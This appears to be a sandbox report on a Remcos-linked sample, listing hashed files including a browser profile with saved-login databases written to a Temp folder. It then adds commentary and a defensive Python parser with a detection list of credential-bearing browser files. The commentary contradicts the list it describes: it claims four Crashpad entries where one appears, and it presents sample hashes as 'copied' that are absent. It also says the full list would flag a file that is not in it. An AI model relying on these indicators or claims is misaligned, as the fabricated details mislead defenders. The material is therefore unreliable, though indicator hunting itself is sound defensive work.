SHA256 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4
SHA512 fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 75b40455c9a028f3930bfe2611baef9b
SHA1 1efd55860c3fc15c44fbf5ff35ccb8f4e0a5b8f3
SHA256 ef3c2b9e19dfb137f6a7e9bfd6ec6713382a7349648db28ce22ed4fefd797516
SHA512 4d44c5d35ef7eafd4805621a6557694eeba9bb2b720a3ba903bccd572154fb943c240f23bd8e4dd2ea0a0d1ee055976e4b413043e645bb050d26315e018a73dc

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 21f9a02313b14627811b73a1245f619b
SHA1 5ea3bfdfb9312c166a9d11fc318dfde8aad7fc4d
SHA256 c027e3d3f757c66059e65ce22dda623fc4f01483e0b8430ff29f567e7013a167
SHA512 5812b107ecf3abb9a1de6d082a26c07f5099234e60e35f7cd8c6ae137f0a03a35e9e69410fa151441eedc86ef1ed2b21c3374e0084b6440847ac457737e2981e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

MD5 8c30f103334954d039fdd8be23cb97d1
SHA1 c695bae719073ed4913764280df6febcfc340821
SHA256 31913820f9828753cd3b38c4242b9f46b21710f55ea424b738d2330098931ca6
SHA512 005440876ff6a7380b2d4a3cc9ffe44eacab74437d589763d16cfd488de002fab521e133fadd8f0ef0c6db9fad1c04cb5a881869c0524b466a57ae4f3c04fe72

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

MD5 986962efd2be05909f2aaded39b753a6
SHA1 657924eda5b9473c70cc359d06b6ca731f6a1170
SHA256 d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889
SHA512 e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 22462e7bd116366c410ba2ee97a46267
SHA1 0debc9cbf4156b74673ce2b32469b3bc609e754d
SHA256 df93690ea7df9121dbca44dd2127718366e615e57f15221a94de2e791d15be29
SHA512 329117c7e8cad2f6ed82f278168ad0a4b974c0727bc690930558153b0e994fff8708c1589a02d4c367219ba30b101bd788d4d58ea95ad117a0a1028847b03a07

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 60edeab40b0e636767cb77040663fa8c
SHA1 d62e5a1f8716a085351a85f2cbd62161e300dbc5
SHA256 6e63ddaa656ffac5cc79fce6eff8b65a07aff813a332e4f02d4778d4220ffbc2
SHA512 a73c2e5260c6229fa3b703c0ee2b59d993a2bfc449986ff481bd5bc46808f36f222ef0d2d215099675dcb9f895f3c5f3beea9ea0918aef0653f0a686a822c865

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 d30bfa66491904286f1907f46212dd72
SHA1 9f56e96a6da2294512897ea2ea76953a70012564
SHA256 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907
SHA512 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

MD5 8a001c7144415e9d1d211d17bf31d1e2
SHA1 95d7d175391d5cda739e18d5e170b7f4557946e5
SHA256 24eb83fb93099cecce73a405afea2b4b8ab7c867bb162cabd0e4fb994fee2524
SHA512 19ab7aa8fb75dc389466bf61d7de579a58e522a8c1c5a46fd191655a42465480e41b319ae793df4f286b499af088536c4896166043c80d7733eabb4009c30c0f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

MD5 69449520fd9c139c534e2970342c6bd8
SHA1 230fe369a09def748f8cc23ad70fd19ed8d1b885
SHA256 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277
SHA512 ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\8b6e5bb9-25e8-4d82-92c7-b5f942ef89a8.tmp

MD5 c38984d9e805bb09f0e562313795a845
SHA1 333960846b2938feda52e197ed27fabc14ae97bf
SHA256 d99a80b79897ec4db99d5b6f73166e316e5f8de97afe7d3115986cee4faeda88
SHA512 c2d861a737d8a600e4d6a2e70c6e5bc4e17057478570fff308e76ab7f47240673f30d72d3b43b82bed155ba3574cfb0ee5a931563de8369a20df6365d4faed63

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

MD5 d4b76f0f52bb2a15e81af07a40c6b4c1
SHA1 987129f944f6e0a81012bc628a2bc961a5c4e4d3
SHA256 97c1ef1039704d159e5922f002a53604c200ef6157e7c90805ab45b294a11ff6
SHA512 f04dd2e289c5e378a1be1cb957582465e524b625ff9990fec8542134c679b825bb7f7cf4ebd30f72fcd82c26d5534e2e19bac9764222be8b763a118d348b4047

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

MD5 68f2fa2c1e637fee71ede032f391dcce
SHA1 3094ed5d5c740fee500d6bfb2b4eb7994f2a2c70
SHA256 3faa0680f636dff455d578cfb83afdbfb419a6721e66509de5bd9de354c370b2
SHA512 61087d0f0571dc378abb90ffca52bc4986f4a6639637dc1274214947b1b1af7ed382694613a8a6bee799950b4f31243eb0c4d1aa8aec79d41fed40817debd4c2

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

MD5 7f4d7f3ee4f94ddb23aa0938572191ac
SHA1 c1a433117ac6811d4f3300e01f87edea4368d213
SHA256 25bb260fe79c75684754769702e6a1cb9ebef3f1469bde87b426f6b0f8cdbbd6
SHA512 5b2637d407909adc5e7917b1fee187ce435c60961a2b256fa46f4492ad0f6d15a33c9f95b560a7db1013505a35af9fc349259cd83fa75a0f03cc633c0fb0db18

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

MD5 0a075fb8a1fdb2f919fc00566c615d59
SHA1 3b3350d583cd6d17cce55b59dc63311ab4e0d7d8
SHA256 f41738cdeb85511e264d68f4785fba7046d0ee794ca5f3ab14b7ab929be0e2c1
SHA512 b524973f0474516563315c913ad126d218a1404e12239c30ee776e2da2e0689ed202137a8e93eef1ea3a8d5d18e3b4a0eb8e29fb099674a61d5a3e2a720d1c20

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

MD5 a730900258ed38858b9fbfa2ff5ce2c7
SHA1 40c70f2c15b8cabc31fd17369c8b339b8f4eba1a
SHA256 d8bbce03e2da15a835a126ff8842aae4411ea41bcffd84bafad35e7fe50a64a2
SHA512 9bc19fdda38139cea1f0f0ccaba1493dec6973d0230e563f92eb0f04e08d89fbe565f939ae0678cc8dbdc7765ec60678c81d0a51a62be610cda933d6f6067154

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

MD5 0d2128728e031357994ae4fa5fd00e34
SHA1 d860bb10fe672c8be6e4fcc2ed3d0b1384d18546
SHA256 f6415e7c2a5df89219bebe4166d6780c188829a29d5851b8f2f2b01cec3ad40a
SHA512 e26876b3dd96af8286874989ff7b7de9f35057f0d64ab9a52bfa536dd7dabffd5ac9a67d72afb98ace859778fed9d65ea614b57f200ee412fba1855347bbaffb

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

MD5 1cdfa1da39b0d3cfd540b1bff6ba3a75
SHA1 49db4f45753597a2d4c7b666f11a3ca97636b961
SHA256 4189a9eaf3b6f10d2d2757ad7339247d4e32b4bd3953e59d0f6f2041982fe664
SHA512 172df124e1657835244f02de12775fc157eb494bb1b3e09ac73fb72f3d4550c0199e2f77cdb7634461b71d64f4c5f84646b0a40df39566c8a37eada9a67f86c4

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

MD5 9082ba76dad3cf4f527b8bb631ef4bb2
SHA1 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0
SHA256 bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd
SHA512 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

MD5 9ede785060bfaf9fce4cef66098cd066
SHA1 ac865f1b67fd146d068bf3c746bf4d4a66dbcde3
SHA256 68d1078dff980d0c06a5e05eddf8c9b296db694d7f0149210efb33260685ec9a
SHA512 4f9b6f73d6c9f5c3eb3c21ed298a88a47ca699103aba7ea9ab853f084d5ebd0434ebe97c09f66e2376f38ecae372ccbf4823d390447fbb06700c0494de33499a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 29dd59136b751e60185d95a980e9b248
SHA1 3b150ac92ff9933789837689b51a11b03c1836de
SHA256 78dd8471a19ae8ad1260d0a748f2821636b31c56fad5dd6ab4b486aca9165180
SHA512 0ee45e32fbd2f769b7f9ee111c69071d315b49081eee31cce64be59b87bea876aee956ed46cab22f0ea8285e677a3a39e76f3fca28bb824da4160193bf6b5535

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

MD5 0e531c73e648f37d820d329f351521d0
SHA1 f7e00301bba3b5ca13cda7ae552a9b9b640088c9
SHA256 0b4dbf8aa5e5382a7880aa552ec8e03188d80d622aafc47840ec2469cefcacca
SHA512 fbedb2837d9701b36fad60d403a06f1a153eb7ed4532c2df0c834f889bfe39e1a72cc5f23e59a7b806ad01f19cc961e9b418517e256de3bd8507ebfa9725a27f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 b273175ed670469bf73f2500c9611c77
SHA1 4ddeb5747309350511b11ad3917e18b254f96880
SHA256 3dbc8f1743075e9b8e13090f9de6097bf4f0d1d093782673de2c8bb046c17147
SHA512 3f64fdc3f6a3e6dfc692ec7eceb1da26ba3476bb75b6d18ea3f834e52e8e03fb1ddd11168e2cbbc0f260b25154a7e8eadaff78d4b50eaee63c3e4d682a57a889

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 df2ba82966444f17cf7682b6f25871de
SHA1 4e859ca6bb10c85459c2f5505f3e20cbe99481aa
SHA256 eae400604babe9d15c9218ea5b3d9d9503ca75d784551c33febc4cc682f545aa
SHA512 02c3c4fefc16b13185352408260f3f6c68be96fbc9f7fa5710c3a0c02776485132285cab928005c0dcc71a3b212bca477171b3eb2678ee79c8bd2f2b39642e88

C:\ProgramData\remcos\logs.dat

MD5 ed4876292afd1022b165798b4483ffc2
SHA1 48e529c155c5b824efd66b1a5dc21d13cd87c78d
SHA256 b094017d028020e3159c20ae141c972e11d5b692414f278bcc2c837578930c89
SHA512 2c071b29ad7de43bfc958ba22d2ad907d4c56832bc9a002d01e690984d4a8172d02caca27e57a8adbf73a27a1c0795846f1824c80df8e5d01743153b1f735b8f
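Two things in the file list above matter for hunting: a Chromium-style browser profile (the Microsoft Edge.lnk entry points at Edge) written under %TEMP%\TmpUserData, including the Login Data and Web Data databases that hold saved credentials and autofill data, and a log at C:\ProgramData\remcos\logs.dat. Note also that Crashpad\settings.dat appears four times with four different digests: the content of these artifacts is generated per victim, so the paths, not the hashes, are the durable indicators. The Python below is an added example, not part of the sandbox report. It parses records in the exact layout printed above (path line, blank line, one "ALGO digest" line per hash), drops the browser cache and Crashpad noise, rewrites the sandbox account directory to %USERPROFILE% (assumption: "Admin" is the sandbox user, not a victim name), and lists which paths were seen with differing digests. The sample block is constructed from four records copied from the list above with SHA512 lines omitted; the category labels are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: four records copied from the file list above, in the report's own
# layout (path line, blank line, one "ALGO digest" line per hash; SHA512 lines omitted).
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 e2f5d4717e3eafb8de215e3435deae4a
SHA1 1edb0025c7db8ae00e20bdad35429615a5d7d365
SHA256 368c28ae3ff41abc5cab8e75775db13d3fa6bb8a4257c5fa5a35da77eef74fb9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 a890c65af1a525e1d4a63b0ec8d2ae05
SHA1 1aaa0f996ca686d26f88a1527259b97ed504b6ec
SHA256 740af2cbfcb709f25e40761f5309332f1488cb8c070371af89630766e4cd7936

C:\ProgramData\remcos\logs.dat

MD5 ed4876292afd1022b165798b4483ffc2
SHA1 48e529c155c5b824efd66b1a5dc21d13cd87c78d
SHA256 b094017d028020e3159c20ae141c972e11d5b692414f278bcc2c837578930c89
"""

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Assumption: "Admin" is the sandbox account; a victim's profile name differs, so generalise it.
USER_DIR = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+", re.IGNORECASE)
# Chromium profile files that hold credentials, cookies or browsing data (my selection).
CHROMIUM_SENSITIVE = {"login data", "web data", "cookies", "history", "local state"}


@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)


@dataclass(frozen=True)
class Indicator:
    category: str      # my own labels: "browser_profile_in_temp" or "rat_log"
    path_pattern: str  # host-independent form, usable directly in a hunt query
    sha256: str


def parse_file_block(text):
    """Parse path / blank / digest records, rejecting digests of the wrong length."""
    records, current = [], None
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        m = HASH_LINE.match(line)
        if m is None:                       # any non-digest line starts a new record
            current = FileRecord(path=line)
            records.append(current)
            continue
        if current is None:
            raise ValueError(f"digest before any path: {line}")
        algo, digest = m.group(1), m.group(2).lower()
        if len(digest) != HASH_LEN[algo]:
            raise ValueError(f"{algo} digest has wrong length for {current.path}")
        current.hashes[algo] = digest
    return records


def classify(path):
    lower = path.lower()
    if "\\programdata\\remcos\\" in lower:
        return "rat_log"
    # A browser profile under the user's Temp directory is not where a normal browser keeps one.
    if "\\appdata\\local\\temp\\" in lower and lower.rsplit("\\", 1)[-1] in CHROMIUM_SENSITIVE:
        return "browser_profile_in_temp"
    return "noise"                          # caches, Crashpad, LevelDB LOG files


def hunt_indicators(text):
    """Non-noise records with the user directory rewritten to %USERPROFILE%."""
    return [Indicator(classify(r.path), USER_DIR.sub("%USERPROFILE%", r.path),
                      r.hashes.get("SHA256", ""))
            for r in parse_file_block(text) if classify(r.path) != "noise"]


def volatile_paths(records):
    """Paths listed more than once with differing SHA256: hunt on the path, not the digest."""
    seen = {}
    for r in records:
        seen.setdefault(r.path, set()).add(r.hashes.get("SHA256"))
    return {p for p, digests in seen.items() if len(digests) > 1}


if __name__ == "__main__":
    for ind in hunt_indicators(SAMPLE_REPORT):
        print(f"{ind.category:24} {ind.path_pattern}")
```

Feeding the full list above through the same parser would flag Login Data, Web Data, History and Local State under TmpUserData plus the Remcos log, and would mark Crashpad\settings.dat as volatile; the TmpUserData directory name itself is the indicator to search for across endpoints, since the file digests will not match on any other host.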